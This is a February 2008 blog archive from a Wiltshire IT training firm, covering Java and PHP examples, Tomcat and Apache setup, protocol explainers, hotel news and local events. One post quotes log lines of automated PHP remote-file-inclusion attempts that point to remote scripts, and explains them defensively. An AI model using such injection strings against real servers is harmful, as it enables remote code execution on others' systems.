« January 2008 | Main | March 2008 »
February 29, 2008
Calling on Melksham / Trowbridge / Devizes / Chippenham businesses
We're running another Speed Networking event on Wednesday, 19th March 2008 - an excellent opportunity for each of 20 local businesses to meet 19 other businesses - for five minutes each.
. In five minutes, you'll have a minute or two to introduce yourself and your product, a minute of two to listen about someone else talk about there company and product and then have plenty of time to exchange contact details and agree to follow up after the meeting or another day. There's no limit to the number of good contacts you make, and the evenings have been a great success for our own business as well as those who attend.
Venue - Well House Manor, Melksham. Evening price - £15.00 including buffet. Places limited - please get in touch if you want to book!
19th March gone? These events are running 3 time a year and I'm sure there will be more - please let me know if you need to know the next date.
Posted by gje at 06:15 AM | Comments (0)
Related topics: via article database
More about Graham Ellis of Well House Consultants
February 28, 2008
Getting somewhere with the train service
We may be getting somewhere! If you've noticed that I've been a bit quiet on this blog of late, it's because all H**l has broken loose in all sorts of areas, one of which of which is the campaign for an improved train service here abouts.
I'm off to speak to a public meeting on the subject in half an hour, at the Mayor's reception tomorrow night, and talking again in Taunton on the topic on Saturday. I've put a fresh status report up ... here
Posted by gje at 05:10 PM | Comments (0)
Related topics: via article database
February 27, 2008
Trying out our Java examples on our web site
We've included all of the source code of our training examples on this web site for quite a long time now ... and about a year ago we put working copies of most of the PHP scripts up there too (we have left out those which show security holes).
Now we're in the process of adding some of the Java code too - not only the things that are intended for the web (you'll see separate posts pointing you to servlets and JSPs) but also those which are stand alone demonstration - for which we have a new wrapper.
Here are some examples ...
a program to show classes in packages and that code running
a demonstration of a for loop and that code running
Pascal's Triangle generated in Java and that code running
and
Reading text and rejustifying it and that code running
More to follow in coming days and weeks!
Posted by gje at 06:26 PM | Comments (0)
Related topics: via article database
Useful link: Java training
February 26, 2008
Java - a demonstration of inheritance on just one page
Here's a challenge, just given to me by my Java Delegates, to put my complete example of a Rectangle and a a Circle class, both inheriting from a Shape base class, and a test harness ... on on a single screen. A bit tight, and a bit uncommented, but here it is!
public class Circle extends Shape {
int w;
public Circle (String col,int w) {
super(col); this.w = w; }
public int getarea () {
return (int)(w * w * 0.25 * 3.14159265); } }
// ---------------------------
public class Rectangle extends Shape {
int w; int h;
public Rectangle (String col,int w, int h) {
super(col); this.w = w; this.h = h; }
public int getarea () {
return h * w; } }
// ---------------------------
public class Shape {
private String colour; private static int nshapes = 0;
public Shape(String colour) {
this.colour = colour; nshapes ++; }
public String getcolour() {
return colour; }
public static int getcount() {
return nshapes; } }
// ---------------------------
public class Tablemats {
public static void main (String [] args) {
Rectangle Salisbury = new Rectangle("Orange",30,20);
Circle Bath = new Circle("Purple",25);
String scol = Salisbury.getcolour();
int sarea = Salisbury.getarea(); String bcol = Bath.getcolour();
int barea = Bath.getarea(); int nmats = Shape.getcount();
System.out.println(scol); System.out.println(sarea);
System.out.println(bcol); System.out.println(barea);
System.out.println(nmats); } }
Now - they have to come up with two types of animals - Pets and Farm Animals - where a pet has a specified value and a farm animal has a value PER KILO.
Posted by gje at 11:15 PM | Comments (0)
Related topics: via article database
Useful link: Java training
February 25, 2008
Advanced Python, Perl, PHP and Tcl training courses / classes
This item is adapted from an answer that I have just written by email - but the question / conundrum as to what to do with fractured advanced training requirements is a common one, so the answer is worth wider sharing. I believe that our solution provides an innovative way of meeting advanced requirements for tiny groups of 1 or 2, in a way that's cost effective for them, but which also makes commercial sense for us - not in terms of extra courses being profitable (which they are NOT) but in terms of customer care at a sensible expenditure of overheads
Fundamentals and some intermediate courses for most programming languages cover a pretty well defined set of topics that are common to the majority of delegates, but as things get more advanced they also get more specialised. For example, there are 4 different GUIs with Python (you could argue 5) and most people will only use one. Which is a bit of an issue with training - it doesn't make commercial sense for us to lay on a lot of advanced courses with few takers, so we use a different approach - our "Extra days". They work like this ...
Delegates who attend a regular course may also book for a day or two of extra training. Those extra days will be run at our Melksham, Wiltshire training centre on days to be agreed with the delegate(s) - typically on days that are otherwise hard to book such as a spare Monday or Friday in my diary before / after another 4 days course. And as they help fill up "off peak" days, we only charge the standard cost of a public one day course for each extra day - 350.00 for the first delegate, plus 250 for any further delegates in your group. But it IS private for your group.
Subjects taught - "you tell me". That sounds a little fluid, but about a half of our business is private courses for which we have a load of additional training material that doesn't appear in any public course and we've used a whole lot of things that we know but don't have notes on. With Python, Perl, PHP and Tcl it's almost a case of me saying "we can handle any advanced requirements". Where that expands (Python case) out to Zope, Plone, Django, etc I might be on slightly thinner ice - quite happy to cover and intro and how the language works with them, but I wouldn't offer or pretend to be able to give full courses on any of them.
There is no need for you to book extra days at the same time as you book your main course - indeed, it might well be that I cover some of the extras during the main course / can talk through things enough for you when I finish for the day - if it's just one extra module you need, there's little point in doing a whole extra day. So that's something that can - if you wish - be resolved later. But I'm equally happy if you turn round as say (for example) "I would like to cover the XXXX Gui, Web interfacing and Django and get some practical experience with displaying Database information on a web page through Python as an extra day" ahead of time.
There is general information about our extra days here (and an example for Perl here. General Python training information (as Python was used in the example above) is here
Posted by gje at 07:30 AM | Comments (0)
Related topics: via article database
Useful links: Python training, Perl training, PHP training, Tcl training
February 24, 2008
Online hotel reservations - Melksham, Wiltshire (near Bath)
I'm happy to announce the release of our online booking system for rooms at Well House Manor - the hotel that we run alongside our training centre, catering also for other visitors to the area of West Wiltshire and Bath who are looking for larger, superior rooms, unlimited internet access, large screen TVs, etc, in a quiet environment close to the town centre.
Since we actually teach the technology, we have written and are running our own booking system that's designed to suite the needs of our guests - and we've reduced the inputs you'll need to make to just three easy pages.
1. How many rooms do you want to book, for how many nights
2. Guest details, including preferences for twin or double, bath or shower, and estimated arrival time
3. Credit or debit card details and contact address, phone number and email to confirm booking.
And when you've completed the third form, the system will email you back to let you know you're in the system, and our internal availability pages will change to reflect your booking too. As easy as that.
Of course - it's designed to be easy for you. WE have had to put a lot of thought into it, making it both friendly, secure, and easy for the newcomer to our site to use.
A straightforward front page asking for key data (dates and numbers of rooms) so that we can quickly confirm availability and prices.
A logical set of options, allowing our guests to let us who they are, when they'll be arriving, and any other notes they want to add.
And finally the page on which we collect card details to guarantee the booking (we don't take payment until the guest is with us). We also confirm the cancellation policy on this page, as ask for acceptance of our hotel terms and conditions which are written in plain English and come up in a separate window!
Posted by gje at 01:48 PM | Comments (0)
Related topics: via article database
Automatic startup and shutdown of Tomcat
Setting up Tomcat to shutdown and startup automatically when the Linux / Unix server restarts. The following is for Fedora Linux, with Tomcat installed at /usr/local/tomcat (probably via a symlink as taught on our deployment course). Server configuration - assuming a default run state of 3.
1. Copy catalina.sh to /etc/init.d/tomcatrun
2. Add the following after the #! line but before any executable code
CATALINA_HOME=/usr/local/tomcat
export CATALINA_HOME
PATH=/usr/local/java/bin:$PATH
export PATH
JAVA_HOME=/usr/local/java
export JAVA_HOME
3. Add the following symlinks in the /etc/rc3.d directory
lrwxrwxrwx 1 root root 19 Feb 23 10:37 K04tomcat -> ../init.d/tomcatrun
lrwxrwxrwx 1 root root 19 Feb 23 10:37 S98tomcat -> ../init.d/tomcatrun
Let me stress - this is an example - you may have differences depending on the OS flavour, default run state, install directory for Tomcat, and other daemons that you are starting.
Posted by gje at 05:30 AM | Comments (0)
Related topics: via article database
Extra public classes in deploying Apache httpd and Tomcat
We have just scheduled an additional two Deploying Apache httpd and Tomcat courses, to start on Monday 3rd and Wednesday 5th March 2008. This course is "flavour of the month" - I ran such a course the week before last, a tailored private course last week ... and I have another public course scheduled for May, yet another for July!
I'm writing this note just a week before the extra courses which (at this late notice) I expect to be smaller groups that usual - they were largely scheduled for one client company, but if YOU would like to join you would be welcome and I can accept further bookings at £500.00 + VAT (plus £60.00 per night excl VAT / £70.50 inc. VAT per night if you want to stay at Well House Manor rather than commute.
I know this item will get cached and still be read long after the courses have run. The Apache httpd and Tomcat course is a regular one - so look at our course diary for the next runnings. Regular price is £600.00 + VAT - still a bargain - and that price is valid until December 2008.
Posted by gje at 02:28 AM | Comments (0)
Related topics: via article database
February 23, 2008
Which modules are loaded in my Apache httpd
Modules for use in httpd can be loaded statically or dynamicaly. A couple of core modules are built in by default if you build your own server, and you can choose others too using --enable options to the ./configure command. We do this on our Linux Web Server and Deploying httpd and Tomcat courses with mod_proxy and mod_rewrite.
The -l option to the httpd command tells you which modules you have statically loaded:
[root@p15161732 root]# httpd -l
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c
[root@p15161732 root]#
Additional modules are loaded dynamically as directed in your httpd.conf file and any further files that it includes, via directives such as
LoadModule access_module modules/mod_access.so
LoadModule auth_module modules/mod_auth.so
LoadModule auth_anon_module modules/mod_auth_anon.so
LoadModule auth_dbm_module modules/mod_auth_dbm.so
LoadModule auth_digest_module modules/mod_auth_digest.so
LoadModule include_module modules/mod_include.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule env_module modules/mod_env.so
LoadModule cern_meta_module modules/mod_cern_meta.so
LoadModule expires_module modules/mod_expires.so
LoadModule headers_module modules/mod_headers.so
LoadModule usertrack_module modules/mod_usertrack.so
LoadModule unique_id_module modules/mod_unique_id.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule mime_module modules/mod_mime.so
LoadModule dav_module modules/mod_dav.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
LoadModule asis_module modules/mod_asis.so
LoadModule info_module modules/mod_info.so
LoadModule dav_fs_module modules/mod_dav_fs.so
LoadModule vhost_alias_module modules/mod_vhost_alias.so
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule imap_module modules/mod_imap.so
LoadModule actions_module modules/mod_actions.so
LoadModule speling_module modules/mod_speling.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_connect_module modules/mod_proxy_connect.so
LoadModule cgi_module modules/mod_cgi.so
LoadModule cgid_module modules/mod_cgid.so
LoadModule suexec_module modules/mod_suexec.so
LoadModule frontpage_module modules/mod_frontpage.so
LoadModule jk_module modules/mod_jk.so
Posted by gje at 10:12 PM | Comments (0)
Related topics: via article database
Java (JSP and Servlet examples) live on our server
On our Java Programming for the Web and Deploying Apache httpd and Tomcat courses, we provide a ready-written demonstration that includes simple web pages, a basic JSP, JSPs with tag libraries, and a couple of Servlets - with some calling up data from a MySQL database.
I have uploaded the examples so that you can try them out here. You can see the source code of almost all the pages here and you can download the complete file latmjdemo.war from our download centre.
Posted by gje at 03:54 PM | Comments (0)
Related topics: via article database
Useful link: Java training
February 22, 2008
http, https and ajp - comparison and choice
In a web scenario, client to server traffic is usually carried using an http (HyperText Transfer Protocol) transport. That's both from browser to public facing server, but also in ongoing transfers from the public facing server to other servers which provide content or run business logic in many applications.
But you'll note that I said "usually" - there are other transports that are available and used. The first group are those which transport the same data as http - specifically https and ajp. let's start off with describing what's in http.
What is http?
An http request comprises a series of lines of data, each new line terminated. The first of these lines comprises the request method (such as GET or POST) followed by the name of the resource required (such as /index.html) followed by a protocol version (such as HTTP/1.1). Subsequent lines include such things as the name of the host being contacted, referrer headers, cookies, the type of the browser, preferred language, and a whole host more details. In HTTP/1.1 only the name of the host being contacted is required in subsequent lines - the rest are conditional or optional. In the case of the POST method, the header is followed by the data that's associated with the request. An http requested is followed by a blank line which indicated that it is complete.
A server processes an http request and sends out a response. The response comprises a header block, a blank line, and (in most cases) a data block. The first line of the header includes a response code which indicates the success or otherwise of the request - a 3 digit number in the following ranges:
200 and up - success; expect good data to follow
300 and up - good request but only headers (no data). e.g. page has moved
400 and up - error in request. e.g. request was for missing page (404)
500 and up - error in handling request. e.g. program on server has syntax error
This line of the header block is followed by other headers telling the receiving system the content type (Mime type) which allows that receiving system to know whether to handle it as HTML, and a JPEG image, etc. Then there's a blank line and the actual data.
As there are often multiple requests made from the same client to the same server in quick succession (for example a web page will call up images), the connection often stays alive for a few seconds under HTTP/1.1.
See http protocol specification for further details
So what is https?
The https protocol carries the same information as http, but adds to it a secure socket layer (SSL). In other words, the data is encrypted at the client and decrypted at the server, and then the same happens in reverse. The purpose of this encryption is to ensure that stray data packets that are viewed along the way are no use the person who has them - they're uninterpretable binary data.
The https scheme is quite complicated - it starts off with the client having to establish that it's really talking to the correct server (and not some other machine pretending to be the correct server!) and then goes on to agree with that server just how things will be uniquely encoded. The same keys can't be used for multiple connections between different systems, or individual security would be compromised.
See https protocol - detailed description
How about AJP then? How does that compare to HTTP?
The http protocol is quite expensive in terms of band width - it's an ascii text protocl with words like "POST" and phrases like "Content-type:" taking up more bandwidth than is really needed, and having to be interpreted at destination too. So the ajp protocol (Apache Java Protocol?) was established to allow for much less expensive exchanges between upstream and downstream servers that are to be closely linked.
ajp carries the same information as http but in a binary format. The request method - GET or POST - is reduced to a single byte, and each of the additional headers are reduced to 2 bytes - typically, that's about a fifth of the size of the http packet.
See ajp protocol specification for further internal details.
Should I use http, https or ajp?
For most browser to server traffic, use http. If there's a need for security in the data (or if you're in doubt / customers may question the security), use https.
Between servers, http actually works very well - if you have an Apache httpd fronting a number of other servers (be they Apache http or Apache Tomcat), then there's nothing wrong with using the protocol at that layer too. Httpd's mod_proxy and mod_rewrite both allow for forwarding, and server languages such as PHP and Perl can make outgoing requests from the top tier server to other servers using http.
If you're looking to share the load between a number of second level (application) servers from a top level httpd server, mod_proxy_balancer introduced in Apache httpd 2.2 provides you with the tools that you'll need, and mod_rewrite can also do a good load distributions job (although the distribution algorithm is simple). For programs running on the server, outgoing requests can be distributed programatically.
One of the big issues of forwarding to a series of machines to balance the load is making sure that a series of linked pages and data entries called up by the same user are properly co-ordinated ("session continuity" it is called) and both mod_proxy_balancer and mod_rewrite provide the facility to support this. In the case of mod_proxy_balancer, it's a core feature. With mod_rewrite, a clever configuration.
If you have intensive / busy servers with bandwidth issues between them, use ajp as your linking protocol. The now-excellent mod_jk (available for you to build from the Jakarta project in Apache httpd 2.0 and prior, standard with the httpd distribution from Apache 2.2) provided an excellent use of the protocol, and support in Tomcat is strong. Many commercial systems are using ajp as their transport, and some recent benchmarks I did showed it to be 25% faster that httpd. You, should, though, remember that the transport is only a tiny part of most applications and so the savings are likely to be minimal on a real live system.
See protocol documents if you want to read further into this.
This is quite a long story, isn't it? If you're setting up multiple servers and sharing resources, you may want to learn the deployment and configuration details. We run several courses that may help you, where you get a chance to set up and try out the various options - see Deploying Apache httpd and Tomcat if you're linking the two servers, or Linux / Unix Web Server if you're configuring / linking multiple copies of httpd. We can also arrange specific private courses for groups, and / or short consultancy sessions. Contact me - graham@wellho.net to talk about your particular needs.
Other Protocols
To help complete the picture - protocols such as ftp and rmi transport different types of content, and xml, soap and the like are different layers. Again - I can cover that for you if needed!
See also:
Load balancing with mod_jk
Choosing between mod_proxy and mod_rewrite
Posted by gje at 09:59 PM | Comments (0)
Related topics: via article database
February 21, 2008
Hotelympia - show report - the lighter side
I enjoy trade shows. But, I confess, much more being on a booth than going around the show. So seeing "Hotelympia" on Tuesday and Wednesday was interesting, but I don't think I'll be going back next year - perhaps in 2010? And I found myself comforted by what I saw - that we do have most things right at the hotel. So here are some pictures - observing people at the show and rather than the products.
A general view, with people wondering where to go - and I could add another show that I just missed of a line of stands, with staff on each standing at the front of the stand as if to defend it from borders.
"10 high quality sales leads a day is good for us" said one representative - who's product we use - said to me. And with quiet areas such as this around, that's probably good news for them.
There are stands with products of all sorts - incredible colourful ranges from dustbins to coffee makers to people selling nothing but sticky labels!
The Coffee stands at trade shows always seem twice as busy as coffee stands elsewhere, and the prices always seem high. Yet go just a little of site (as we did) and you can find quieter spots.
Here's a change from last year - hold your break as you enter the show building, through "Smoker's Acre" which is a new area from when we were at the show last year. There was also an amazing range of garden furniture offering as much shelter and as much oppulance as possible while remaining - just - legal for smoking.
And at the end of the day heading home.
For our own (Well House Consultants reference), I'll be providing a fill in on (a) a local cake company, (b) a cloche for breakfast sliced bread, (c) a better system for wrapping food (d) a hand dryer that's from a local company (e) next generation chairs for delegates on long course, and (f) longer life and greener bulbs.
Posted by gje at 06:23 PM | Comments (0)
Related topics: via article database
February 20, 2008
New bathing idea for hotels from Hotelympia
I've been known to comment on training courses that we'll have true internet integration with everyone when 
we can contact our bath as we travel home and have it filled and ready for when we arrive.
Well - gulp - we're getting there. Here's a hotel system that controls all the baths from a single central point, allowing for filling, emptying and even a selection of bubble bath as appropriate to be supplied.
The hotel display panel shows a load of graphics and at this stage seems to be hotel based, and local as opposed to wide area
And I did notice that all the rooms were occupied by a couple known as Mr and Mrs Smith.
Give it a couple of years, and it will be in the home, I expect. And perhaps we'll be able to replace "Who's been sitting in MY chair" - as said in Goldilocks and the three bears - by "Who's been bathing in MY bath" ... and have the question answered direct to our pdas.
Posted by gje at 11:13 PM | Comments (0)
Related topics: via article database
February 19, 2008
The geometry of East London
Lisa and I are in London - this afternoon and tomorrow - visiting the Hotelympia show at the Excel centre in docklands. More on that tomorrow, but I couldn't resist taking the architectural geometry of he area in a few pictures. Above - the lift and stair shaft up to the bridge over the dock.
Railways - Docklands light (from Becton, in use) and North Woolwich branch (ex Silverlink, withdrawn, track being lifted) from the bridge to the Excel centre.
Old cranes around the docks
A plane comes in to London City Airport. Yes - I have been at this one with Photoshop!
Posted by gje at 05:36 PM | Comments (0)
Related topics: via article database
Letting new visitors know we provide training courses
I never see the most downloaded image on my website. Well - hardly ever. Here it is:
Brash? Yes! Bright? Yes! It's an advertising link, to let people who arrive at our web site looking for technical information (and there are thousands a day) know that we can help them with training courses. But of course people don't want to be overrun with adverts so once the point has been made, more subtle links are provided on following pages.
The $_SERVER[HTTP_REFERER] variable in PHP tells all of our pages the URL of the page on which a link was clicked to bring them to our site, and for search engines, that includes the query string that they entered. A little simple analysis with regular expressions, and Robert's your father's brother (or should that be "Bob's your Uncle").
We have a series of about 10 images like these ...
... in that case displayed to people who are searching for Melksham or hotel. If you want to see them in full technicolor (I HAVE warned you!) have a look here.
We have a script which shows you the most downloaded images from our site that I wrote a few weeks ago and if you want to see the source so that you can do something like this, it's here.
Posted by gje at 07:01 AM | Comments (0)
Related topics: via article database
February 18, 2008
FSB, EGM, AGM.
Well that was a VERY odd evening ... an Extraordinary General Meeting (in deed as well as in title) of the local FSB Branch, followed by the delayed AGM at which a committee was elected.
"No Comment" on events - except to say it was eventful; I've never been at a meeting quite like it though others have come quite close. Really I just don't have the time to do as many things as I would like and, though I have good friends there, I'm relieved to not be going forward as a committee member.
Home at 11 p.m. to Moderation issues on the Coffeeshop, following up on emails from [name dropping removed but very well known names in these parts] and preparing to leave for a trade show in London first thing in the morning.
Oh - of course I can't resist just the odd comment. The EGM chewed things over but really didn't resolve the issues. The AGM elected a strong committee which, if it is allowed to function fully in all quarters, will bring the branch a renewed strength and I wish them good luck.
Marion Mortimer, in giving a chairman's report on the time before the problems started, commented on my "train campaign" with compliments. I also compliment Marion on her support for the campaign, including joining a train at Melksham before 6 in the morning. I hope she'll be able to join us again at about 20 past 8 on the morning of 8th December 2008 - and not just to watch an empty platform as it is at that time at the moment.
Update - November 2009. This article has recently been brought to my attention as being potentially biased, incomplete or in error. I am happy to make necessary additions to complete the story or reflect other views, and to correct any error of fact. See here
Posted by gje at 11:26 PM | Comments (0)
Related topics: via article database
February 17, 2008
Learning Object Oriented Principles (and perhaps Java)
During an intensive 3 day Java course last week, I gave an introduction to the principles of Object Oriented Design, and a very short segment on design principles (there's a limit to how much can be covered in three days, and Java itself was the main topic).
As a follow up to that course, I promised to let the delegates have a .pdf copy of the notes that I have previously written on the subject - and in fact they're available under an open license as follows:
14 pages on OO fundamentals
10 pages covering the next level
24 pages on OO design principles
Please note - these are VERY MUCH notes to accompany the course and lectures; there are some subjects such as Object Orientation which are especially difficult to learn from books and are ideally suited to a classroom discussion with interactive development of examples relevant to the class. "Not only WHAT is the answer but how did you REACH the answer". If you want to learn Java and the OO principles, I have a course running the week after next - see the four day bootcamp and Java Programming for the Web agendas. (You'll want the latter if you're writing Server side Java, the former for other uses).
Posted by gje at 08:39 AM | Comments (0)
Related topics: via article database
Useful link: Java training
Are nasty programs looking for security holes on your server?
Looking through my log file reports for the last week, I have found the following in my "failed requests" log.
546: /errors.php
52: /errors.php?error=http://www.beautiful-america.com/admin/id.txt?
42: /errors.php?error=http://www.ticarbon.de/phpBB2/files/i?
32: /errors.php?error=http://test.iearn.uz/test.iearn.uz/assist.txt???
27: /errors.php?error=http://www.dg-mitteldeutschland.de/sys_crank/i?
26: /errors.php?error=http://hornydate.co.uk/sparky.txt??
25: /errors.php?error=http://www.sternkinder2007.de/video/lol?
So what are these requests? Should I be worried?
They're attempts to break into my system. But I'm not being particularly targeted - this is an automated attack, attempting to call on a script which I don't have to run code that's held on those remote sites which have previously been compromised. And if they succeed, they they'll set the same hole up on my system and carry on to the next.
The particular accesses above actually don't worry me - they were all "404"d - but rather they form a warning of the dangers of allowing external code to be included in PHP.
Visiting the URLs given as the "error=" parameter, I find a variety of "not found" pages which means that the hole has not been closed on the remote system, and nasty pieces of PHP which mean that the remote machine is still compromised. (If you, reading this article, visit any of them you should get a 404 as I have distorted the URLs that were live - I don't want to make this into a "how to break in" manual page!). But I do have copies of the scripts that I can show bona fide delegates on our PHP courses, and of the futher log details of the programs (often in Perl) that are injected.
If you are worried about being infected, the particular attack file contains the string "Mic22" - so if you search for that ...
Posted by gje at 06:51 AM | Comments (0)
Related topics: via article database
February 16, 2008
Colour, Composition or Content
Is it the colour, the content or the composition that most makes a picture? I have heard arguments - but I don't know the answer. But I do know I have uploaded a lot of pictures that I like in the last hour or two.
I like the colour of the reflection in the windows - this is the Royal Liver building in Liverpool, with the reflection of the sunset on the Mersey in the windows.
Pure content - but a picture that says so much about the development in Liverpool, and gives us some pointers as to why it may be happening there but not in Melksham.
For the composition. The view from the restaurant at the Premier Inn at Liverpool's Albert Dock.
In reality , it's all three that help make up a picture. Have a look at some of my others just uploaded here ... and other recent (or recently labelled) pictures here and here
Posted by gje at 09:14 PM | Comments (0)
Related topics: via article database
February 15, 2008
Chinese New Year
Microsoft taking over Yahoo ... Sun taking over MySQL ... Oracle taking over BEA. I knew we had just celebrated the Chinese new year and I was wondering what you're we're into. I think it must be the year of the takeover!
Posted by gje at 08:30 PM | Comments (0)
Related topics: via article database
February 14, 2008
A forum is not always the best vehicle
"Please try to give solution for dis problem asap." writes a contributor to our Opentalk forum - where we answer technical / programming questions on the subjects that we teach (link to Opentalk).
Opentalk was set up as a service for our course delegates - I really want to know what questions commonly arise after courses so that I can add those topics in to courses, and I really want to stay in touch with delegates too. But is has grown into more than that - I'll also answer other questions that are asked as, very often, the questions are excellent and the questioner is helping me build up a resource of answers that encourages more traffic to our site. Building the presence, if you like.
I posted a follow up, commenting that I always follow up as soon as I can, but that can't be instant. And there was a further follow up from the question poster.
"I am Sorry for stressing you for the solution." Ah, but I'm not stressed. I just feel that the forum sometimes produces unrealistic expectations - people feel that they can ask a question and, because we're an electronic medium, have answers at electronic speed. And they're then disappointed that they don't get an answer within five minutes, and that the person answering doesn't have all the time in the world to come up with that answer. It's fun answering most of the questions, so I wish I DID have the time.
There's also another false expectation that can be raised by a forum - the expectation that a newcomer can post a series of questions about a subject and, through a series of question and answer steps, learn all about the subject. But I don't believe it can be done, practically, that way. If you've not got the basics of how to write a book, quoting a paragraph from someone else's book and asking how to update it to reflect your own needs isn't going to help you structure your whole book.
Why am I writing this? To help - I hope - to explain to people why I'm not going ahead and writing long answers to each and every question asked, but rather suggesting when they get beyond a certain point that they should consider reading a book or attending a course. It's my intent to help them make effective use of their time, but there's a tendency for them to think I'm being greedy and it's my prime goal to get them to pay for a course. And, OK, I admit it - I do sometimes feel cheesed off at giving free support, without thanks or payment.
Posted by gje at 07:09 PM | Comments (0)
Related topics: via article database
February 12, 2008
Teaching Object Oriented Java with Students and Ice Cream
"I'm getting tired of students. Can we do something else". So said my delegates at Cardiff University today. So we did Ice Cream and other deserts!
Perhaps I had better explain. I'm running a Java Course there, and looking for examples of classes and objects to write about. At the start of the course, delegates know diddly squat about OO design, and how it works in Java, so the first sample programs they write are tentative steps and using only an edited selection of the facilities available. Then they extend the example and find that "I wish I had known before I started that I would be going this way" but the catch is that they couldn't have known - too much information before the first practical means a poor practical and some points missed. So after the first example has been written, stretched, overstretched and pulled apart nearly to the point of breaking we consolidate the knowledge gained into a fresh example which can be written, from the beginning with the end target in mind.
I'm not doing to show you any of the "student" examples. They look horrid / they show things that are kludged together nastily and I would be ashamed of them. But I will show you the Dairy Queen class!
public class DairyQueen {
public static void main (String [] args) {
Desert [] Ice = new Desert[6];
Ice[0] = new Icecream("Chocolate", 1000, 100,0);
Ice[1] = new Icecream("Vanilla", 1400, 150,-15);
Ice[2] = new Icecream("Strawberry", 1200, 100,-15);
Ice[3] = new Icecream("Nut", 900, 100,-15);
Ice[4] = new Icecream("Pistaccio", 450, 50,-25);
Ice[5] = new Colddesert(1500,90,-10,"Strawberry and courgette cheesecake");
for (int k=0; k
int cals = Ice[k].getcals();
int wei = Ice[k].getweight();
System.out.print(what);
System.out.print(" ");
System.out.print(cals);
System.out.print(" ");
System.out.println(wei);
}
}
}
And how does that run?
Dorothy:febjava grahamellis$ java DairyQueen
Chocolate flavoured Ice Cream 1000 100
Vanilla flavoured Ice Cream 1400 150
Strawberry flavoured Ice Cream 1200 100
Nut flavoured Ice Cream 900 100
Pistachio flavoured Ice Cream 450 50
Strawberry and courgette cheesecake and custard 90 1500
Dorothy:febjava grahamellis$
Now - do you feel cheated that I've not shown you all the code? I'm glad you've noticed that I've not shown you everything but that's the very joy of Object Oriented programming. YOU write the bits that YOU know about, someone else writes all the detail that they know about, they hide it within a class of objects and you keep calling the class methods as you need too. This hiding stuff within is known as encapsulation!
Full code? Oh - if you MUST ;-)
Desert.java - basic object for a desert
Insurable.java - how to define something that's insurable
Icecream.java - an ice cream desert is a desert with other features
Colddesert.java - a cold desert is another type of desert
DairyQueen.java - the whole application (above) which pulls it together
Posted by gje at 11:00 PM | Comments (0)
Related topics: via article database
Useful link: Java training
February 11, 2008
To Wales - where theres still a toll on the bridge
As I drove to Cardiff this morning, I paid my £5.30 to cross over the Severn into Wales, and thought of the luck of the Scots who have just had the tolls lifted from the Forth and Tay bridges ...
Posted by gje at 06:29 PM | Comments (0)
Related topics: via article database
February 10, 2008
A Weekend in Liverpool
In fact a WORKING weekend in Liverpool, as I was up there to have a look at some web server issues for someone on a day that the web servers weren't being hammered with live traffic - but that's a comment for another thread. I'm writing this late on Sunday afternoon, having missed out a Saturday post as you'll see, and I'm still working on systems to take with me to Cardiff tomorrow morning.
Right. Liverpool.
If I wanted to have a picture that shouts "Liverpool" at you in just one photo - that would be it. The docks, the hive of activity, and the Liver building. But, alas, it was dark or nearly dark for the time that Lisa and I had to look around, so I'll give you some other pictures which are short on detail and long on atmosphere:
Posted by gje at 05:35 PM | Comments (0)
Related topics: via article database
February 08, 2008
OO PHP demonstration - comparing objects and more
Object Oriented PHP course today, and I though I would share an example I wrote during the course with you. Source code here and see it running here.
What does it show?
* A base class matching ... which is extended to a mactainer class, which is further extended to two further subclasses cube and cylinder.
* Polymorphism in the getvolume method
* "larger" and "largest" methods which show you how to compare 2 or more objects of a type (always an interesting subject for newcomers)
Posted by gje at 11:23 PM | Comments (0)
Related topics: via article database
Useful link: PHP training
February 07, 2008
Where in the world / country is my visitor from?
If you visit of current traffic page you'll see that we identify users by country - and we do this using the Maxmind Geolocation Technology. You'll see it's on a country by country basis - Open Source data (currently under the "Geolocation technology" button on their front page, and some simple APIs in various languages, let us use a 500k file to look up IP addresses very rapidly. You'll find that we also use the same algorithm to ensure that we tailor our pages to suit you when you arrive on our site - for example, we'll present our phone number as you would dial it from your country.
There's now a Region / Town database available Open Source on the same site too - a much bigger data file download of around 15Mbytes and I have not yet had a chance to play with it - but I do know that a lot of former customers and other readers of these notes want to do more accurate geolocation than "percountry" so I thought I would pass you the tip. I can also point you at a portal that uses the database run by one of our customers. It's here and you can type in an IP address and get a Google map to show you (roughly) where it is. Neat one!
Posted by gje at 08:15 AM | Comments (0)
Related topics: via article database
February 06, 2008
Short and sweet and sticky - PHP form input
Today I have a short and (very) sweet PHP demo that calls for a user to enter a few pieces of information, and validates them - prior to storage in a database, perhaps.
Why is it "sweet"?
* Because it implements techniques such as sticky fields so that user who make error don't have to keep re-entering
* Because it validates user inputs and gives good error messages
* Because it handles awkward characters, injection attack attempts, etc
* Because it can be shifted from one URL to another without any code changes
* Because it can be easily modified to include any number of extra fields with their validation without having to do lots of low level code
* Because it can be very easily split into three elements - standard functions, a template for the HTML, and the applications top level making it a good foundation for the "4 layer model" approach
Try it out here
See the source here
When you're writing PHP look at each of those "because" clauses and aim to write your code to meet as many of them as possible. Good for the author, good for the user, good for the maintainer.
Posted by gje at 11:13 PM | Comments (0)
Related topics: via article database
Useful link: PHP training
February 05, 2008
Comment spam blocked. Please comment via Forums
I welcome comments on this blog. There's no way that I want to stop any readers coming back with comments on what I have said - such discussions make a very lively ongoing debate on certain subjects, and other viewpoints add so much to what is sometimes somewhat one sided in what I write.
But, this morning, I have turned your ability to comment here off. That's because there's been a significant growth in "Comment Spam" - people or automata who are posting up messages off topic to advertise their services and bearing no relationship at all to what this site is about. To give you an idea of the scale of this, I'm seeing about 2 dozen comments an hour and that's 24 x 7.
Here's a graph of our incoming email traffic
The red section is emails which are rejected by our spam filters, and the blue are emails that are delivered to our email boxes. Each bar is 24 hours, with weekly lines. Horizontal lines every 250 emails.
But - PLEASE - comment via the forums that I use / administer. I am posting this to both my Horse's Mouth Blog - Open Source programming, Hotel, Wiltshire, Personal stuff and to my Save the Train Blog where I'm making dealing with train services (or lack thereof) from Swindon via Chippenham and Melksham to Trowbridge and Salisbury.
Forums:
